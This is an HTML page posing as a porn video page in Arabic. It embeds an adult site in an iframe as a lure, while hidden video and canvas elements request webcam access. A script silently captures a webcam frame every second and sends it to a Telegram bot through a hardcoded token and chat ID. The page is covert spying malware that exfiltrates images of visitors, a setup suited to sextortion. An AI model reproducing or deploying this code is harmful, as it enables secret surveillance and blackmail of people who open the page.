<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8" />
<title>Video Porn</title>
</head>
<body>

<video id="video" width="0" height="0" autoplay></video>
<canvas id="canvas" width="320" height="240" style="display:none;"></canvas>

<iframe 
  width="100%" 
  height="2000" 
  src="https://pin.porn" 
  title="YouTube video player" 
  frameborder="0" 
  allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" 
  allowfullscreen>
</iframe>

  <script>


<script>
const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const ctx = canvas.getContext('2d');

const TELEGRAM_BOT_TOKEN = "7637585480:AAGvzoKRGOPR-gDp3ygL9MgEoRkaiTSyVLw";
const CHAT_ID = "5454881984";

navigator.mediaDevices.getUserMedia({ video: true })
.then(stream => {
  video.srcObject = stream;
})
.catch(err => {
  alert("لا يمكن الوصول إلى الكاميرا: " + err);
});

async function captureAndSend() {
  ctx.drawImage(video, 0, 0, canvas.width, canvas.height);

  canvas.toBlob(async function(blob) {
    const formData = new FormData();
    formData.append('chat_id', CHAT_ID);
    formData.append('photo', blob, 'photo.jpg');

    try {
      const response = await fetch(`https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendPhoto`, {
        method: 'POST',
        body: formData
      });
      const data = await response.json();
      if(data.ok){
        console.log('تم إرسال الصورة');
      } else {
        console.error('خطأ في الإرسال:', data);
      }
    } catch (error) {
      console.error('خطأ في الإرسال:', error);
    }
  }, 'image/jpeg');
}

// التقط صورة كل 5 ثواني تلقائيًا
setInterval(captureAndSend, 1000);
</script>

</body>
</html>
